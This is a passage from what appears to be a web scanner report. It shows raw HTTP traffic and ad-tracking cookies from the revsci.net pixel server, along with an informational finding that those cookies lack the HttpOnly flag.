User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==; rsiPus_ujqo="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+Atwis1ELtJdrj4R8jRRkHy362Kg9l9j12Fne8dMQJZUXWmSdO5nwhjxWdV4Kc+ZjwDWyB3QMjJ4fF+m9lVo3qnvZVw4LutWRkL22Hw4Kz6k0cFJN0i2ZvAbE7Bstv7fR0SabeL+ZpICwVpx/u0HdlAUDc7lBUsfbQGZgZL0dTqOST8wX+PhUN1bZVgcaXGzTvtwVFXKYB2I3CNvw5vwJcg2LzV80dREIWCFz+RSmIHpscvV6HL3O21RAGNtSP9eKQiAqmxufZrUZtvKGTbQ4OUPapeYisBn/mLyG+DnrXih7YstoaXSNXNyBw9tnu/kYZ2Wy8ugsYdZdg79OiSRnJpTdWxYyMt5odORpHaCcTsLhgkMx+XFx0NxPpHWWMAviDZpD0+2ZoVe81SFPEBm3tp9yfV7bk5TiayC92SSkcgbZwy4cnmVqKB1ZG8TpmtgVwdnUNuLPq/2hXZ1A7Tf5+ubEWjoHbM9bi/yeQgVBOLh/6/UIjd4TnzEQCQOhk2wNe7pWzhqvI+5X8Cqmdvu6tpVa7C+Nk6GnfGUcGt8PFuFkcJ4tfVffnafOFFkLT1PebdMfm+f7hgIjxjRnkEBAUd4Fdp1eVbRfHnggvjmoPJwywKL7UxyIW//r3C7XOcp2c+yZ3MmMzd4W8THoM/Lw2eBqcUGUAYA2HLPurkH25Rs928sz4FlT5nUB9yXKc45760A7dHuQmUrDhIZleDb2rHzVChRvJNfuMCvH4iu6x+Irn3VJOuyy8lpbyeOR0wRziDxiiKjApW5nTVuxGG0RszGW7rAw7zvFLmiOwMfhEok8Cv90GF6Z0B10Fk8uIHCKCDzV87TdQHUFyTYmzoO34HXLt261b4BNW7ml1nYlv6e39/Gn44aib/c1kb7tHnM+/JPsM7LiVmw3tGtbWIJiaZ+VLboWASTqxZUKhSbzk2s3hi2ngwzW04eEE+RFHRAV1AYVJUXrhRtK3yminctNkCVsQ3O/MonDQRvrY0zxZSFczNaLVfhEV3c2j5zNjp/154CvaHZdLa5M4QL0vDFSyslWGvxs13V5K8zoAQ7fXdIvu4gsY2pns2QyHQZ7oeS1FLsVa3QsqgRlPg+JJ2saXdJqe7hQZrzxfflyM60fA1SOkpM2UeuKkfrkhm14zhLHX3UBJ+6rY1WiZ9Kb3WsWx18RnkyX9hDtKk1ZcU9hmLPQjUstFZuV3vNJnO9eRadVgNGKD2nQQYghU1ZjZY2pPjItsnAco2oRRh7KAph2R4qy5kWFJEYjfrXIV5ow0VrekoHWL2s+EXgOaxc1cBJteHWs9iiLH4PhG0Hv/ES/wVObzmPW+72HqcTdMEaeaJerLU="; rsi_us_1000000="pUMV4x9HOCYc7H2Hdyd9gGYQxP6z87yv1/38fIfxXZ6hwopPJc1FCSfeEyinowUDu/6bHU/fppSZT968mAptVLd0gbR5UmTQx7YoMtsHUFy++96sia434M7cM6z8EDegCG0sJZJi2jDtzdF4Bo9ZEBaq7bUCfOnAlu2nto+pv7eVoA2lQLC4rSCbUn4f3OIOO9UPbm75nLJpjm/LzlQbrc2B3h7Ks3L+GK58JHL35KxtgSGRMVLv2jEjbDneecAAFdo+jT5YLix73R4OU6xpNVAlKXCKMxIbWoxbnl9NNfIUcezUALRReb4lPzpTmIJXGt8o8VyiAFcOKaf7Cll7pouSTtxLa808q4zjl3Si+70znE5U9HGXN9e0bM1nS8X3BVzvsR4lH1I0UVdEYSl8FssU6pOavCj/jzZ8dH93xxZ1kQqIfCzSdlAImPmYeIDywPZWHS4/c8M6xWdp3AS2760efiUUGVEja50v2Mgdj+FhNbzJBr6jjaLG1xPfKfiYRzGLqQJv70zj6yMXZOtcf2K6F8EPs02PSCRo8maGxM3jEqHlTBdWI15Ded0AEwZ+ldfwdW7LFpv9cYbjbVEGAEuNOw+jcfmaBErhNtUI56iyeKcMmZyqPjA/GY3kHS89R6I7UAgPbcSex8A2bvfG9m5WaangtU32B7+q0hZCsarOYUL5Qqt4HD5zctFUakMYCKNLuU58Vu0Y5jaiLe+2D5x69In9bkhvruS2v380SNEpf5JBLUF0UsgSyrb8SZUsFVBnCQz7podYm58A+PYHGpfwJjo8BJ1pEcK+39KU/V8qlF3czYQjVBMh5D3kw60Q1MaNZ06jJjhCdUiHRG2J4o/WKdmjurh9K2FQ41UexDSAIOxv2Gaj5B+DRmLckXKLc0IP7lV2qMc6F87RbtjjbqYCcRlS+1ZH6mGyDHaWyuRCm00rSJecxBBvf0OPGpaCt9rVDd5dC/apsRL18RnFeIEyp/3XM/Gc5Ad+fCgwcLqZQhNpb6Fxfn4q+D5YqrCgOvn6wVSbMsu1vuGHJmkjQrqwww9McBQBTyZQcfFJRejePaisI3pQASyehBE7EGo6WueN8TUdxTLZBZgJu4q7ylaocHjz3Yr2gGEohYG2D8NUJGQGY4tr2iWNO9B55kC6k+7phvae1BkP3V7IhltGq+ELTDsmYocV0YjzeXdSF/YD8e+YLB64MJcSTsig9Ldov8j7LyNfbPTQRF1NbfrSChWzM0cYu7WH82kA4CkLjOvAO5+XXThBqtKAwLVYsJReui/62jgOhOiO1SbxXRYvQgxUJG/2bwdGIx7xXGzYZxQrbm1Lgiq4sduZppPZJ+nHQ+jUO9TSAQqvBl6UErn8jCzQZMbe7MEhaqGO3sVg26k1sDHTMFugNKMbDnN0uiTvOQcy+YZ4SmONcbnTSJfNfN67BozcnNAf58eVd7rSAhG9q/tZkXUcqfkb0e3zx/7oyEKj7iyxN80Dr8ekHicYqp6nkydKw7W2L0yb5WDCn0+nz1vNALBSOlQg6z4gxabk3UTASDt6JqWJ9LhG0M7EJSG9GIUCKhh+Tn9QvE1nsV53rQsn5MFjFO/kVSzk/YVCbflod3UGhyrThMVAyqh/vec+xYJDvVaM+vjUDtFG8BGKdfF3Sux0ymaiZV6jOEckNKL4C73eZB/Y+bi9yHR+zjJEUKqTo9Dil9dLFzGGpLbt5+sM+I3yvcm8JAU2PiR745PmrLrVRU6EJyGuFH3tsRHMkw+hS2Uf+JnP113fUmTGhYLsXE4DR1HMD9ALfpUs0ymAJLmRxfquWg3yLE25bUXhK98K4A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huQIMTzaxu2F29/z4Oss1gLZjShnPT2/YPsJSum2Nh/Po4/dc2v9kDss6IjMts0PjmAyiPkvzZFbWhoYNWaeW+Yz6ayuyY8QpqLhIdHKAwUlBI+6iD3yXxwTKzfWBMz3kvMW7wrmG7H9vyAGJjwJyAcvhV4adQjTPEtazp/gW9ojmaM2fZiSgxO0hFnzZ7Y9aUs4uBNb/DQygvC6YBkUoo6pZype7eFDChF6wyqawbxiaqAFzltOxTOdqmRt9Sq1D0ZSc8D58jGzdzv7qT/bDeaOuIqgBSw2rKNR73SJfr00QjwCLB6JkEvzbrEOOLjHLrW8XnuZK9jUqV0QyIdN22WoxFcIoF5Ik6yzDT/lN5mGArFEKKd8ZVDijRfdJpAKDx6bQZwzbKMGh6XCCsjc4PTWhFQt5s8d1tCMge7w26rMOHNW5Muf/pH413A7x0JJ1kd94wczxR4jYglYfKSZf3KAURUb7I8SINPtk3LnwcK+E2kbksWp8FnyAnjlaaGrn1prsjsXyFBs0y2GLMCblCGAeSUnm7w0VBnmcoFxvSDFG/RAwNAcs488RQKg6W4AofHQdC8JNXhK8lhiI27Dd2Za/N3pt6lciisBp9w1COzQ8n+/U75gfmy5OGITOSxkZMjejXX0tktQ5AK4OzFAdYyCXyzx+yygziK4hVXa+jVGi8LuNTzSK+6W7PaKxnq098DKYkyAfwdiopZliO9bHnIw55IgVyMyuBk0TfaqXFses/V5xWSrRGjp4rdtKy8Ig0rrU8KPH4tPzqPcST8lGlnRvOC6+O0863E4TGK6XoKFir6RNEOgubeoQ+8Guak7YD/5C+CP1QYXVNbBK1NBE; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39yEJZjpv597JwHIRqQjgYATtJkLnfaG2qraMZB+wNcQAqiLCTArLHxzvFq5u+Lz+XZTpAGsSnAnIZ5EiYYU2Q5F27Lp3P4kg+B9zATNAQ3RqfX7tCLTk5AqN1ccbx5y4vf4L8AqfXp3YzxBdmO0SDwPtR4hxu4SvUtjRfPy1yofzFWJy8DjgpF9Vv7z4IwN/Glg2eAulkmXyJvHDxkHnDbCT0kvZ1s0/zvhv0RCqBEvF7tNIPnlACrrdjfPO3L8fl6lJV6fxQGDz4OojI+L45ARFGQP2xgjWQnVlIBDtC2AEV+GP5RjuCatHEuXXjaz/UTSZ2wGOPBof5+tBvFXIRZnO/C8sRTPYzxKuQL8w9GpVq6oxiVTh1QzRavI7tIK02zbdcd4VZqk7m7CEqealnEalVMP22Du9oN3j/qYDdfkRo1BVCH8V1yeu7O0FhqyJGhqO9YDJLCWqVG68JmEwAmMOVBaJzOVSgC9jW5w1fsopFgN5+ltD0t4CODq0kBbFsc/ap3Gysy/+xdi6BPYZc3NEhsdIF6SXp4UQnSjeh4vYQj9MHoyYeJto76Zy38QHU/MC9wTbVLI19s42MtegC+w8aF+UnIHBiOBIu39JZrWsGQHIqve2KC6PNaKhnPO8pLx7DtEh7p7QLYFSwAE5Q5GUu0tcTCh+sK+szx/GAAlvkW+Y+xA2r8mLGe/Zh43/E97HIZWSrbcGMUvxgV8USa2zw+6Hpkbx1RlDKxz+3wL08BYiiEoAjxeAgZOiaZ2O1PaQR4FEulJn+4PYQSlKywNeusxtOLE51lw+687pEoslxBiJjCFj1FW6D3YEY4yqsMpvW7H+XZvezzCI1kPcMJGN/0vaanxvfyEqb/57xhH9rQXTslfsxj8igUc1dm0O5tqa8yA5aJhul05zs6oBpxpnpxrLlaJKnh0K7cipFhaiEZmFxwZFLVr/w9hPQGFoBm5aCOREIqvTcjB86M4P2FwfCJe0hNEr98YtX5yxNqSq9FhH8aUluJXJRoOfNZIGqtM00dHxp7Ls0f8i4j2c5FxXHIGGxB9gjHMuY/sSTPyW8S2UBdUmEcZatMkyUSTILoY7EB8jfX941U9T+9Y9gKddqMnn3mP3obhIzhqnkt8049FSrgx8dKMU4OkmzU4RFmVwAanRHrhQPCc9oMLsEmukQ9FhxoHQhkfO3JSNtyWhjqgtXlL8Jsdi0y09iZVLB4fhRCg/s6iU3HRTQyIJu10b9r3Qe9dUxHeIrL5DdOiwHRvp+rJTg3+I8jSkEb2FYBbOPRMzb2ohh+pSSvZYrnxAer+LWWv0fCWg7C+jFlSMPeWL5PaznLW82Rt7bLCOdB8mnCSuLRGdmGcpZkG6cXcU3du5Ar7sQ6qj9VYLuohKqujYMBPl67iQmiyM9jEIbJkLmJ7XY/E4O8AWftxS2J+jJ3CMHZ/R9kVwxDtC2a40JiHw9SoSSiOZOuch+8nKU/C0fRXj27ULxSJoXwgKS1bpdqQu4mX1mmJxdznk6AET5MukVR3wTc2V0xpFgz+9wZa2PH3AKyd5yLOoWKQtpl+Cmtmkpi0KRwiCv88Zn4IiQGGQzr8q+NDKW9o+S3qSGoAZ0NAyrWTaUB/nHriAG7+xfHpPcA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:53 GMT

GIF89a.............!.......,...........D..;
9.78. http://pix04.revsci.net/D08734/a3/0/3/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a3/0/3/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a3/0/3/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Frl.com%253F&_rlcdnsegs= HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsiPus_F4VY="MLsXrrMO5Bpv55DW6taiZ2b5rkKgtP29EMOeggN9tKCDiZO6EZttNm2XYivlRGvJx3wq+AcA7TRrX4KAU1K7A+k+BucD/yILHav2qCKVvsYivSPZGUEU+aB9zLDLkrjAkqBHLQKUegX2AQBFFxs2/9Y9TpgT+5EDkLpB5AVp2M+IGst4lB+KF4CtQpkK5YTdVpUha7D+SX8DjJsBZM8wM32dh2TJ6U7yOSJalJGy2OINjHwRF0/X7yOvSnuds90sqBZje9Wr9kWO2iQn4L+ItzkYUx9f0BFaehTTaCpRkcmfar/cpmsz3/Rt+IkpB5CqybBmStcK8+NGk0skkxE5YTFMyCelZwsKUy8fRirZy0Fz0dFKNoKzyJluBxOO6eETgQZxpr/YeSKFo2RvryWsbKm8RH5Yh3IlqR+nYWfua1R7jJ6QGnx4WM/UOuDd9shsHL59RYkHV+/lw9JpahDWATy0yZlfazLyC2u2CJoppfMURxKIA/3jam9ZSgmhrr533InozG0Rsj5/UBjWKezexNxldhuwJdwhKNPl9p85rKWHBmjpla52OR6vY67ayH/gqa1JIaGf7CSYsPdlnzhf+u7f+CpnqmwlcOv9PVcFgPd4tafa0HGdPldmzRA5XY+Hsaxtq2yPeMcJVPHhcVoMZB0h3Tuem4cEJNDDBBmIBWmrsREKY7THr9PlLOCR4V2TMbJuxlF4N2FzJBQZykGOuXVAK8xYO2bQsswjq07nu2ETxzxpsDZtalA4elBHR4YY7QddOwOVF0LXYxs9QhsACxzGYie+ziZJcrtbFgsodfoYKM+kajPccoNoiW78ycwj6nivGmi